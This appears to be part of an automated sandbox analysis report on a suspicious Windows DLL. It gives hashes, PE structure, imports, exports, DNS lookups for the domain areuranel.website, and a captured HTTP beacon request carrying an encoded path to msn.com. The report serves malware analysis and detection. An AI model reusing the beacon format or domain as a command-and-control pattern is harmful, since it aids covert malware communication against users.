                                                                                                                                SHA-512:8708A1C8FE3F89B87370FAE532A4877E25F4B43661C491A6A89F94843EC94E772CC730730213F40C9B6021FB88E55DA7BBC66D985609959E4760DEDBDAD17448
                                                                                                                                Malicious:false
                                                                                                                                Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206301" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER3E5D.tmp.WERInternalMetadata.xml
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8406
                                                                                                                                Entropy (8bit):3.699426610909095
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:Rrl7r3GLNiEjt6EJ6YV/6dgmf8NSMCprs89bxKsf6bm:RrlsNi+t6EJ6Yt6dgmf8NStxpfv
                                                                                                                                MD5:C68EE9F1E9CC2120F276F341A19B2ADC
                                                                                                                                SHA1:C356502CDA05C48684274ACDC1EF601B7C0BCB42
                                                                                                                                SHA-256:8E92D82339769DC546E938521D48F02B2295CCC867E96DA3A0C9B9802662DFE8
                                                                                                                                SHA-512:82A56DCB8302FB319A22119AD036E6DF508C00722338CDB6AC58F8ADC26966836AA6D7F2EFF9BD9E724D035423923155E8191EC36656859655A0B2B16A89CA36
                                                                                                                                Malicious:false
                                                                                                                                Preview: <?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>17134</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString> <Revision>1</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>1033</LCID> </OSVersionInformation> <ProcessInformation> <Pid>4360</Pid>
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER49E7.tmp.xml
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4771
                                                                                                                                Entropy (8bit):4.482639623381592
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:cvIwSD8zsPJgtWI9pFWSC8Bq8fm8M4JCdsPMFP+q8vjsPu4SrSchd:uITfxC0SNNJdmKmuDW4d
                                                                                                                                MD5:4907E384041C5C9D778C701F72E97A31
                                                                                                                                SHA1:70EC43A7F6AAC60CC85361597425778220A4B820
                                                                                                                                SHA-256:6EA365475E9D5B0E05E821C2FF98D74B4F13311B4C9BF2CBA7FEFA13C8D3BE0B
                                                                                                                                SHA-512:417778634689D92CA355958B0791321F83CD9672E3A0CE8F07DB83A6E7EA2FA69AF2CD76D51DC38FD46924132E9F17FC24CB10A54E93F2C023055C31EB70F39B
                                                                                                                                Malicious:false
                                                                                                                                Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206301" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER923.tmp.dmp
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 07:50:51 2021, 0x1205a4 type
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):35708
                                                                                                                                Entropy (8bit):2.3486234062735507
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:Ppoob1NtADw07S8VXjMzQ1IDZqcqa15q+TlYzGEfShfTHHcR:BoobxfR8VQzQaqcJq+JYzGEMTHk
                                                                                                                                MD5:AB79F102EB23B8810370F156BF99C2F3
                                                                                                                                SHA1:AB6185126C490366EA9A2DB1356D419BBF92B2D9
                                                                                                                                SHA-256:DF08B5455FE3079A4AFFE403CE6D1CD2E809784433C83BC1565BDB6835CA7C0E
                                                                                                                                SHA-512:CBDE020EB79704CB9008A597BB27102DD4393583CE542ECB48B1664A9864321A994FDB4F973018FDDE12CEF573274DA211256A37DEB0D755A093865DBCCCFBC8
                                                                                                                                Malicious:false

                                                                                                                                Static File Info

                                                                                                                                General

                                                                                                                                File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Entropy (8bit):6.669952151971332
                                                                                                                                TrID:
                                                                                                                                • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                File name:616412739e268.dll
                                                                                                                                File size:718336
                                                                                                                                MD5:9e67e68ddbedba865b91b5469ab642ef
                                                                                                                                SHA1:f2c7b0735343081be06e48616d0fc14235a28744
                                                                                                                                SHA256:41c0934ba1be030dbae45893107f6a2ae5f99c79d7634626263cdf809f7556ee
                                                                                                                                SHA512:802d983ca7ca04ae737da69ed5772eece8f408c6c02c8d0c42cfea1c1abf25236b02c35c09d56f3ba6a229b3b71f72fa3d4c6735c8670c76affdbbc139b63d87
                                                                                                                                SSDEEP:12288:aUAQSxl6fDEr8Np6b/rPPsjosrS9aEoe+0JCym+4YJAOSVUNcuHIGF4uW/XrGAsV:az3xl6fq8Np6bTPPaBreaZlYCOSVol2a
                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m$aV.J2V.J2V.J2...2U.J2_t.2H.J2.cH3R.J2.cO3_.J2.cI3D.J2...2H.J2V.K2..J2.cO3).J2.cJ3W.J2.cJ3W.J2V..2W.J2.cH3W.J2RichV.J2.......

                                                                                                                                File Icon

                                                                                                                                Icon Hash:74f0e4ecccdce0e4

                                                                                                                                Static PE Info

                                                                                                                                General

                                                                                                                                Entrypoint:0x1003ab77
                                                                                                                                Entrypoint Section:.text
                                                                                                                                Digitally signed:false
                                                                                                                                Imagebase:0x10000000
                                                                                                                                Subsystem:windows gui
                                                                                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                                                Time Stamp:0x5F700BB2 [Sun Sep 27 03:49:06 2020 UTC]
                                                                                                                                TLS Callbacks:
                                                                                                                                CLR (.Net) Version:
                                                                                                                                OS Version Major:6
                                                                                                                                OS Version Minor:0
                                                                                                                                File Version Major:6
                                                                                                                                File Version Minor:0
                                                                                                                                Subsystem Version Major:6
                                                                                                                                Subsystem Version Minor:0
                                                                                                                                Import Hash:b5c6badd398e2e3aa283a40a40432c6c

                                                                                                                                Entrypoint Preview

                                                                                                                                Instruction
                                                                                                                                push ebp
                                                                                                                                mov ebp, esp
                                                                                                                                cmp dword ptr [ebp+0Ch], 01h
                                                                                                                                jne 00007F018CD7E347h
                                                                                                                                call 00007F018CD7EE32h
                                                                                                                                push dword ptr [ebp+10h]
                                                                                                                                push dword ptr [ebp+0Ch]
                                                                                                                                push dword ptr [ebp+08h]
                                                                                                                                call 00007F018CD7E1EAh
                                                                                                                                add esp, 0Ch
                                                                                                                                pop ebp
                                                                                                                                retn 000Ch
                                                                                                                                mov ecx, dword ptr [ebp-0Ch]
                                                                                                                                mov dword ptr fs:[00000000h], ecx
                                                                                                                                pop ecx
                                                                                                                                pop edi
                                                                                                                                pop edi
                                                                                                                                pop esi
                                                                                                                                pop ebx
                                                                                                                                mov esp, ebp
                                                                                                                                pop ebp
                                                                                                                                push ecx
                                                                                                                                ret
                                                                                                                                mov ecx, dword ptr [ebp-10h]
                                                                                                                                xor ecx, ebp
                                                                                                                                call 00007F018CD7DF43h
                                                                                                                                jmp 00007F018CD7E320h
                                                                                                                                mov ecx, dword ptr [ebp-14h]
                                                                                                                                xor ecx, ebp
                                                                                                                                call 00007F018CD7DF32h
                                                                                                                                jmp 00007F018CD7E30Fh
                                                                                                                                push eax
                                                                                                                                push dword ptr fs:[00000000h]
                                                                                                                                lea eax, dword ptr [esp+0Ch]
                                                                                                                                sub esp, dword ptr [esp+0Ch]
                                                                                                                                push ebx
                                                                                                                                push esi
                                                                                                                                push edi
                                                                                                                                mov dword ptr [eax], ebp
                                                                                                                                mov ebp, eax
                                                                                                                                mov eax, dword ptr [100AA0D4h]
                                                                                                                                xor eax, ebp
                                                                                                                                push eax
                                                                                                                                push dword ptr [ebp-04h]
                                                                                                                                mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                lea eax, dword ptr [ebp-0Ch]
                                                                                                                                mov dword ptr fs:[00000000h], eax
                                                                                                                                ret
                                                                                                                                push eax
                                                                                                                                push dword ptr fs:[00000000h]
                                                                                                                                lea eax, dword ptr [esp+0Ch]
                                                                                                                                sub esp, dword ptr [esp+0Ch]
                                                                                                                                push ebx
                                                                                                                                push esi
                                                                                                                                push edi
                                                                                                                                mov dword ptr [eax], ebp
                                                                                                                                mov ebp, eax
                                                                                                                                mov eax, dword ptr [100AA0D4h]
                                                                                                                                xor eax, ebp
                                                                                                                                push eax
                                                                                                                                mov dword ptr [ebp-10h], eax
                                                                                                                                push dword ptr [ebp-04h]
                                                                                                                                mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                lea eax, dword ptr [ebp-0Ch]
                                                                                                                                mov dword ptr fs:[00000000h], eax
                                                                                                                                ret
                                                                                                                                push eax
                                                                                                                                inc dword ptr fs:[eax]

                                                                                                                                Data Directories

                                                                                                                                Name                                  Virtual Address  Virtual Size  Is in Section
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT          0xa8990          0x80          .rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT          0xa8a10          0x50          .rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC       0x146000         0x53d0        .reloc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG           0xa474c          0x54          .rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0xa47a0          0x40          .rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT             0x7b000          0x1fc         .rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                                                                                Sections

                                                                                                                                Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
                                                                                                                                .text   0x1000           0x79f71       0x7a000   False     0.510071801358   data       6.75463290974  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                .rdata  0x7b000          0x2e586       0x2e600   False     0.556366871631   data       5.60181106954  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                .data   0xaa000          0x9b19c       0x1800    False     0.190266927083   data       4.15778005426  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                .reloc  0x146000         0x53d0        0x5400    False     0.752650669643   data       6.72453697464  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                Imports

                                                                                                                                DLL           Import
                                                                                                                                KERNEL32.dll  LockResource, FreeLibrary, GetProcAddress, VirtualProtect, OpenProcess, GetCurrentThreadId, Sleep, GetSystemTime, CreateSemaphoreW, LoadLibraryW, GetModuleFileNameW, GetModuleHandleW, GetTempPathW, CreateFileW, GetVolumeInformationW, QueryPerformanceCounter, GetVersionExW, GetDateFormatW, OutputDebugStringW, CloseHandle, ReadConsoleW, ReadFile, GetConsoleMode, GetConsoleCP, WriteFile, FlushFileBuffers, HeapSize, SetStdHandle, SetFilePointerEx, GetFileSizeEx, GetProcessHeap, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, SetConsoleCtrlHandler, GetFileType, GetStdHandle, HeapReAlloc, HeapFree, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, EncodePointer, DecodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, WideCharToMultiByte, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, RaiseException, RtlUnwind, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, LoadLibraryExW, QueryPerformanceFrequency, ExitProcess, GetModuleHandleExW, GetCurrentThread, HeapAlloc, GetTimeZoneInformation, GetTimeFormatW, WriteConsoleW
                                                                                                                                USER32.dll    CreateMenu, DeferWindowPos, BeginDeferWindowPos, UnregisterHotKey, TranslateMessage, RegisterWindowMessageW, GetPropW
                                                                                                                                MSACM32.dll   acmDriverClose, acmFormatChooseW, acmFilterDetailsW, acmFilterEnumW, acmDriverEnum, acmDriverPriority, acmFormatEnumW, acmFilterTagEnumW, acmFormatTagDetailsW, acmDriverMessage, acmFormatSuggest, acmFilterTagDetailsW, acmFormatTagEnumW, acmFilterChooseW, acmDriverOpen, acmDriverDetailsW, acmFormatDetailsW, acmMetrics, acmDriverAddW, acmDriverRemove, acmDriverID, acmGetVersion

                                                                                                                                Exports

                                                                                                                                Name        Ordinal  Address
                                                                                                                                BeGrass     1        0x10016020
                                                                                                                                Fieldeight  2        0x100162f0
                                                                                                                                Often       3        0x10016510
                                                                                                                                Townenter   4        0x100167a0

                                                                                                                                Network Behavior

                                                                                                                                Network Port Distribution

                                                                                                                                TCP Packets

                                                                                                                                Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                                                                                Oct 12, 2021 00:51:28.727166891 CEST49783443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:28.728127003 CEST49783443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:28.728147984 CEST4434978340.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.835772038 CEST4434978340.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.836008072 CEST49783443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:28.839567900 CEST49783443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:28.839591026 CEST4434978340.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.839824915 CEST4434978340.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.842505932 CEST49783443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:28.883135080 CEST4434978340.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.896899939 CEST4434978340.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.897229910 CEST4434978340.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.897412062 CEST49783443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:28.897692919 CEST49783443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:28.897708893 CEST4434978340.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.897897959 CEST49783443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:28.897907972 CEST4434978340.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:42.616982937 CEST49816443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:42.617027998 CEST4434981640.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:42.617142916 CEST49816443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:42.618019104 CEST49816443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:42.618037939 CEST4434981640.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.121491909 CEST4434981640.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.121779919 CEST49816443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:43.124639988 CEST49816443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:43.124667883 CEST4434981640.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.125070095 CEST4434981640.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.128093004 CEST49816443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:43.171152115 CEST4434981640.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.300297022 CEST4434981640.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.300379992 CEST4434981640.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.300591946 CEST49816443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:43.300734043 CEST49816443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:43.300770998 CEST4434981640.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.300832033 CEST49816443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:43.300857067 CEST4434981640.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.329210997 CEST49820443192.168.2.352.98.207.210
                                                                                                                                Oct 12, 2021 00:51:43.329260111 CEST4434982052.98.207.210192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.329387903 CEST49820443192.168.2.352.98.207.210
                                                                                                                                Oct 12, 2021 00:51:43.330302000 CEST49820443192.168.2.352.98.207.210
                                                                                                                                Oct 12, 2021 00:51:43.330327034 CEST4434982052.98.207.210192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.419485092 CEST4434982052.98.207.210192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.420157909 CEST49820443192.168.2.352.98.207.210
                                                                                                                                Oct 12, 2021 00:51:43.422338963 CEST49820443192.168.2.352.98.207.210
                                                                                                                                Oct 12, 2021 00:51:43.422359943 CEST4434982052.98.207.210192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.422724962 CEST4434982052.98.207.210192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.425338984 CEST49820443192.168.2.352.98.207.210
                                                                                                                                Oct 12, 2021 00:51:43.455162048 CEST4434982052.98.207.210192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.455255985 CEST4434982052.98.207.210192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.455404043 CEST49820443192.168.2.352.98.207.210
                                                                                                                                Oct 12, 2021 00:51:43.464049101 CEST49820443192.168.2.352.98.207.210
                                                                                                                                Oct 12, 2021 00:51:43.464081049 CEST4434982052.98.207.210192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.464117050 CEST49820443192.168.2.352.98.207.210
                                                                                                                                Oct 12, 2021 00:51:43.464127064 CEST4434982052.98.207.210192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.490286112 CEST49821443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:43.490325928 CEST4434982140.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.491162062 CEST49821443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:43.494148016 CEST49821443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:43.494200945 CEST4434982140.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.583831072 CEST4434982140.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.584162951 CEST49821443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:43.586349964 CEST49821443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:43.586366892 CEST4434982140.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.586759090 CEST4434982140.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.590284109 CEST49821443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:43.631139994 CEST4434982140.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.638864994 CEST4434982140.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.639061928 CEST4434982140.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.640309095 CEST49821443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:43.640464067 CEST49821443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:43.640480995 CEST4434982140.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.640497923 CEST49821443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:43.640503883 CEST4434982140.101.60.226192.168.2.3

                                                                                                                                UDP Packets


                                                                                                                                DNS Queries


                                                                                                                                DNS Answers

                                                                                                                                Oct 12, 2021 00:51:42.614928007 CEST8.8.8.8192.168.2.30xe44aNo error (0)outlook.com40.97.161.50A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:42.614928007 CEST8.8.8.8192.168.2.30xe44aNo error (0)outlook.com40.97.156.114A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:42.614928007 CEST8.8.8.8192.168.2.30xe44aNo error (0)outlook.com40.97.160.2A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:42.614928007 CEST8.8.8.8192.168.2.30xe44aNo error (0)outlook.com40.97.128.194A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:42.614928007 CEST8.8.8.8192.168.2.30xe44aNo error (0)outlook.com40.97.164.146A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:42.614928007 CEST8.8.8.8192.168.2.30xe44aNo error (0)outlook.com40.97.153.146A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:42.614928007 CEST8.8.8.8192.168.2.30xe44aNo error (0)outlook.com40.97.116.82A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:42.614928007 CEST8.8.8.8192.168.2.30xe44aNo error (0)outlook.com40.97.148.226A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.325108051 CEST8.8.8.8192.168.2.30xcd71No error (0)www.outlook.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.325108051 CEST8.8.8.8192.168.2.30xcd71No error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.325108051 CEST8.8.8.8192.168.2.30xcd71No error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.325108051 CEST8.8.8.8192.168.2.30xcd71No error (0)outlook.ms-acdc.office.comFRA-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.325108051 CEST8.8.8.8192.168.2.30xcd71No error (0)FRA-efz.ms-acdc.office.com52.98.207.210A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.325108051 CEST8.8.8.8192.168.2.30xcd71No error (0)FRA-efz.ms-acdc.office.com52.97.151.18A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.325108051 CEST8.8.8.8192.168.2.30xcd71No error (0)FRA-efz.ms-acdc.office.com52.97.151.66A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.486862898 CEST8.8.8.8192.168.2.30x8ed1No error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.486862898 CEST8.8.8.8192.168.2.30x8ed1No error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.486862898 CEST8.8.8.8192.168.2.30x8ed1No error (0)outlook.ms-acdc.office.comHHN-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.486862898 CEST8.8.8.8192.168.2.30x8ed1No error (0)HHN-efz.ms-acdc.office.com40.101.60.226A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.486862898 CEST8.8.8.8192.168.2.30x8ed1No error (0)HHN-efz.ms-acdc.office.com40.101.124.2A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.486862898 CEST8.8.8.8192.168.2.30x8ed1No error (0)HHN-efz.ms-acdc.office.com52.98.171.226A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.486862898 CEST8.8.8.8192.168.2.30x8ed1No error (0)HHN-efz.ms-acdc.office.com40.101.62.34A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:49.169133902 CEST8.8.8.8192.168.2.30xc5f5Name error (3)areuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:52:04.047215939 CEST8.8.8.8192.168.2.30x6b6fName error (3)areuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:52:09.213083982 CEST8.8.8.8192.168.2.30x2e04No error (0)msn.com13.82.28.61A (IP address)IN (0x0001)

                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                • msn.com
                                                                                                                                • outlook.com
                                                                                                                                • www.outlook.com
                                                                                                                                • outlook.office365.com

                                                                                                                                HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49759 | 13.82.28.61 | 443 | C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 22:50:46 UTC | 0 | OUT | GET /mail/liopolo/Vn4JvoFId6Cp3NLYZ/ukfCWWcxchPj/qCUcA7g4p8o/IzqGGngZx49dkT/_2Fc3sEBBXvAEYkPgeGA_/2By9PpRoLgfve_2F/vhfdT7HCV506AwB/36mBvSW_2FRJGuHNuA/yE6OJX0fi/uPoeQfh7fRd0REpiPmsf/t9myfegLaxJw_2B8ay_/2FKKbEnJu_2BUYEu1pJNUs/ydzaPjLRj/fW1.jre HTTP/1.1
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Pragma: no-cache
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                Host: msn.com
2021-10-11 22:50:47 UTC | 0 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                Content-Type: text/html; charset=UTF-8
